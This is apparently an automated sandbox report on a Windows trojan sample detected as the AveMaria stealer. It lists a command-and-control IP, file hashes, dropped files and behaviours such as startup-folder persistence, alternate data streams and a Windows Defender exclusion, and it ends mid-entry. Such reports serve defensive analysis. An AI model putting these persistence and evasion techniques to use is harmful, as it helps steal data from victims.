            Source: Yara matchFile source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Jaik.73085.20962.exe PID: 5708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: windowupdate.exe PID: 5732, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts21
            Windows Management Instrumentation            		2
            Registry Run Keys / Startup Folder            		312
            Process Injection            		11
            Disable or Modify Tools            		111
            Input Capture            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            Endpoint Denial of Service
            Default Accounts11
            Scripting            		Boot or Logon Initialization Scripts2
            Registry Run Keys / Startup Folder            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory2
            File and Directory Discovery            		Remote Desktop Protocol111
            Input Capture            		Exfiltration Over Bluetooth1
            Non-Standard Port            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
            Scripting            		Security Account Manager15
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
            Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
            Obfuscated Files or Information            		NTDS1
            Query Registry            		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
            Software Packing            		LSA Secrets121
            Security Software Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common13
            Masquerading            		Cached Domain Credentials2
            Process Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items21
            Virtualization/Sandbox Evasion            		DCSync21
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job312
            Process Injection            		Proc Filesystem1
            Application Window Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Hidden Users            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
            NTFS File Attributes            		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 626897 Sample: SecuriteInfo.com.Variant.Ja... Startdate: 15/05/2022 Architecture: WINDOWS Score: 100 56 Snort IDS alert for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 8 other signatures 2->62 8 SecuriteInfo.com.Variant.Jaik.73085.20962.exe 4 8 2->8         started        12 cmd.exe 1 2->12         started        14 WmiPrvSE.exe 2->14         started        process3 file4 36 C:\ProgramData\windowupdate.exe, PE32 8->36 dropped 38 C:\ProgramData:ApplicationData, PE32 8->38 dropped 40 C:\Users\user\AppData\...\programs.bat:start, ASCII 8->40 dropped 42 2 other malicious files 8->42 dropped 64 Creates files in alternative data streams (ADS) 8->64 66 Drops script or batch files to the startup folder 8->66 68 Adds a directory exclusion to Windows Defender 8->68 70 Increases the number of concurrent connection per server for Internet Explorer 8->70 16 windowupdate.exe 4 8->16         started        20 powershell.exe 25 8->20         started        22 WMIC.exe 1 12->22         started        24 conhost.exe 12->24         started        signatures5 process6 dnsIp7 44 104.128.191.44, 49694, 8080 EPBTELECOMUS Reserved 16->44 46 Multi AV Scanner detection for dropped file 16->46 48 Detected unpacking (creates a PE file in dynamic memory) 16->48 50 Writes to foreign memory regions 16->50 54 4 other signatures 16->54 26 cmd.exe 1 16->26         started        28 powershell.exe 16->28         started        30 conhost.exe 20->30         started        52 Creates processes via WMI 22->52 signatures8 process9 process10 32 conhost.exe 26->32         started        34 conhost.exe 28->34         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Variant.Jaik.73085.20962.exe17%ReversingLabsWin32.Trojan.Jaik

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ProgramData:ApplicationData17%ReversingLabsWin32.Trojan.Jaik
            C:\ProgramData\windowupdate.exe17%ReversingLabsWin32.Trojan.Jaik

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            3.3.windowupdate.exe.10928d8.10.unpack100%AviraTR/Patched.Ren.Gen3Download File
            3.3.windowupdate.exe.10928d8.12.unpack100%AviraTR/Patched.Ren.Gen3Download File
            3.2.windowupdate.exe.38d0000.3.unpack100%AviraTR/Redcap.ghjptDownload File
            0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack100%AviraTR/Redcap.ghjptDownload File
            3.3.windowupdate.exe.10928d8.4.unpack100%AviraTR/Patched.Ren.Gen3Download File
            3.2.windowupdate.exe.2ed053f.1.unpack100%AviraTR/Patched.Ren.Gen3Download File
            0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack100%AviraTR/Patched.Ren.Gen3Download File
            3.3.windowupdate.exe.10928d8.5.unpack100%AviraTR/Patched.Ren.Gen3Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            104.128.191.440%Avira URL Cloudsafe
            http://crl.m0%URL Reputationsafe
            https://ion=v4.5n0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            104.128.191.44true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://crl.mpowershell.exe, 0000000D.00000003.411093654.000000000917F000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://ion=v4.5npowershell.exe, 00000001.00000003.382885100.0000000007B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.385315234.0000000007BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.383555084.0000000007BAE000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		low
            https://github.com/syohex/java-simple-mine-sweeperC:SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpfalse
              		high
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.389408114.00000000045EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412976315.0000000004783000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.388775306.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412820303.0000000004641000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.389408114.00000000045EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412976315.0000000004783000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.128.191.44
                    		unknownReserved
                    		26827EPBTELECOMUStrue

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:626897
                    Start date and time: 15/05/202221:36:222022-05-15 21:36:22 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 44s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:SecuriteInfo.com.Variant.Jaik.73085.20962.11149 (renamed file extension from 11149 to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.phis.troj.spyw.expl.evad.winEXE@17/14@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 84.4% (good quality ratio 83%)
                    • Quality average: 83.8%
                    • Quality standard deviation: 20.4%
                    HCA Information:
                    • Successful, ratio: 79%
                    • Number of executed functions: 62
                    • Number of non-executed functions: 333
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    21:37:41AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat
                    21:37:52API Interceptor1x Sleep call for process: WMIC.exe modified
                    21:37:58API Interceptor806x Sleep call for process: cmd.exe modified
                    21:38:01API Interceptor47x Sleep call for process: powershell.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    EPBTELECOMUSsora.armGet hashmaliciousBrowse
                    • 74.205.129.253
                    sora.armGet hashmaliciousBrowse
                    • 198.254.85.62
                    UzFT5M5FXm.exeGet hashmaliciousBrowse
                    • 184.174.137.97
                    5Wd6PDprFD.exeGet hashmaliciousBrowse
                    • 104.128.189.120
                    4hnK3g1xhKGet hashmaliciousBrowse
                    • 74.205.129.253
                    sora.armGet hashmaliciousBrowse
                    • 45.43.97.157
                    BiE3iG96NLGet hashmaliciousBrowse
                    • 45.43.97.112
                    WXm5RkXHTPGet hashmaliciousBrowse
                    • 104.251.241.231
                    HBHIK0tV3wGet hashmaliciousBrowse
                    • 45.43.97.102
                    Purchase_Oder-Foshan2021Import&Exportchina894hnm078643.exeGet hashmaliciousBrowse
                    • 104.128.188.37
                    Purchase_Order-Foshanexportandimportlimited2021WORKthyretehhwj12223jdhdndddc.exeGet hashmaliciousBrowse
                    • 104.128.188.37
                    qfgP28anogGet hashmaliciousBrowse
                    • 198.254.85.97
                    Js07W5pNr7Get hashmaliciousBrowse
                    • 66.18.54.144
                    gpkwbyuevYGet hashmaliciousBrowse
                    • 184.174.151.8
                    Purchase Order.exeGet hashmaliciousBrowse
                    • 104.128.188.243
                    SecuriteInfo.com.Trojan.Win32.Save.a.26083.exeGet hashmaliciousBrowse
                    • 104.128.188.74
                    z3hir.binGet hashmaliciousBrowse
                    • 68.169.181.252

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData:ApplicationData

                    Download File
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:modified
                    Size (bytes):2054656
                    Entropy (8bit):4.278811521243932
                    Encrypted:false
                    SSDEEP:12288:ed05fRBi1vvXHdJUNoyiiguuJ2glmnGeNCrRcQc/PJcEj2uGn9bunQ7JiD4pa7+o:q1vfHUorlm9NCFcR/PJc4gbunQ
                    MD5:35ED3FE203FABDE1B0D353815F9A273B
                    SHA1:6A5E219FD96905B154295697AC6F72A13725F6A1
                    SHA-256:8D4020BEA8924365724FF2C7EAFFA0541F0AC4712C6B0A4723C5F68858FA306C
                    SHA-512:9657C11D07068F9E054BC701A0789E3918E4554F845B6CF6371299CE477FB17CEF6F4AB97469BECB5892BB66091435E1BFB187299A8D6722564813EC767B4CBB
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 17%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.j.*.j.*.j.*...).g.*.../...*.....z.*...).~.*.../.V.*.....~.*...+.e.*.j.+..*...#.n.*....k.*.j...k.*...(.k.*.Richj.*.........PE..L....?|b.................H...B..............`....@.......................................@..................................G.......@..@....................`...`......T...............................@............`...............................text....H.......H.................. ..`.rdata.......`.......L..............@..@.data........`.......B..............@....rsrc...@....@......................@..@.reloc...`...`...b..................@..B........................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\windowupdate.exe

                    Download File
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2054656
                    Entropy (8bit):4.278811521243932
                    Encrypted:false
                    SSDEEP:12288:ed05fRBi1vvXHdJUNoyiiguuJ2glmnGeNCrRcQc/PJcEj2uGn9bunQ7JiD4pa7+o:q1vfHUorlm9NCFcR/PJc4gbunQ
                    MD5:35ED3FE203FABDE1B0D353815F9A273B
                    SHA1:6A5E219FD96905B154295697AC6F72A13725F6A1
                    SHA-256:8D4020BEA8924365724FF2C7EAFFA0541F0AC4712C6B0A4723C5F68858FA306C
                    SHA-512:9657C11D07068F9E054BC701A0789E3918E4554F845B6CF6371299CE477FB17CEF6F4AB97469BECB5892BB66091435E1BFB187299A8D6722564813EC767B4CBB
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 17%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.j.*.j.*.j.*...).g.*.../...*.....z.*...).~.*.../.V.*.....~.*...+.e.*.j.+..*...#.n.*....k.*.j...k.*...(.k.*.Richj.*.........PE..L....?|b.................H...B..............`....@.......................................@..................................G.......@..@....................`...`......T...............................@............`...............................text....H.......H.................. ..`.rdata.......`.......L..............@..@.data........`.......B..............@....rsrc...@....@......................@..@.reloc...`...`...b..................@..B........................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\windowupdate.exe:Zone.Identifier

                    Download File
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Preview:[ZoneTransfer]....ZoneId=0

                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14734
                    Entropy (8bit):4.993014478972177
                    Encrypted:false
                    SSDEEP:384:wZvOdB8Ypib4JNXp59HopbjvwRjdvRlAYotiQ0HzAF8:UvOdB8YNNZjHopbjoRjdvRlAYotinHzr
                    MD5:C5A56B913DEEDCF5AE01A2D4F8AA69CE
                    SHA1:C91D19BFD666FDD02B0739893833D4E1C0316511
                    SHA-256:1C5C865E5A98F33E277A81FCDADFBAB1367176BA14F8590022F7E5880161C00D
                    SHA-512:1058802FCD54817359F84977DD26AD4399C572910E67114F70B024EBADDF4E35E6AFF6461F90356205228B4B860E69392ABC27D38E284176C699916039CFA5ED
                    Malicious:false
                    Preview:PSMODULECACHE......#y;...Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1........Start-BitsTransfer........Set-BitsTransfer........Get-BitsTransfer........Resume-BitsTransfer........Add-BitsFile........Suspend-BitsTransfer........Complete-BitsTransfer........Remove-BitsTransfer........-.^(...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1....#...Set-AppBackgroundTaskResourcePolicy........Unregister-AppBackgroundTask........Get-AppBackgroundTask........tid........pfn........iru....%...Enable-AppBackgroundTaskDiagnosticLog........Start-AppBackgroundTask....&...Disable-AppBackgroundTaskDiagnosticLog.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Unins

                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):21540
                    Entropy (8bit):5.601157753176713
                    Encrypted:false
                    SSDEEP:384:wtL6/0UWqENJ82XRYSBKnWZispE93C1u16zq5mHKHyQ3DrjaIvUI++j/:SHH8v4KWlwC3qUZGX2ly
                    MD5:29B2B467A2C4A48C8645FF0AA566BEB2
                    SHA1:C043EEA8A352A9A4A80B27AFF10B94017E98258C
                    SHA-256:192DEC31FD6C2C952502D10D265BA639BA30A3F18172A734D18E807BE65A318A
                    SHA-512:A83E902CBD5D128E75F4E45085F9DA6B80D6442529628CA2F59DAAA69C33A63AA661D9B9D22A3215E2FC9B6B3B23B34A83402DB71FFCF93964BCC4572B6DDE47
                    Malicious:false
                    Preview:@...e................................................@..........H...............<@.^.L."My...:=..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)Q.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xfmcqke.tvf.psm1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pyoxucyx.042.psm1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeiqozgs.3mq.ps1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tacmmont.cza.ps1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat

                    Download File
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):140
                    Entropy (8bit):4.86129651314522
                    Encrypted:false
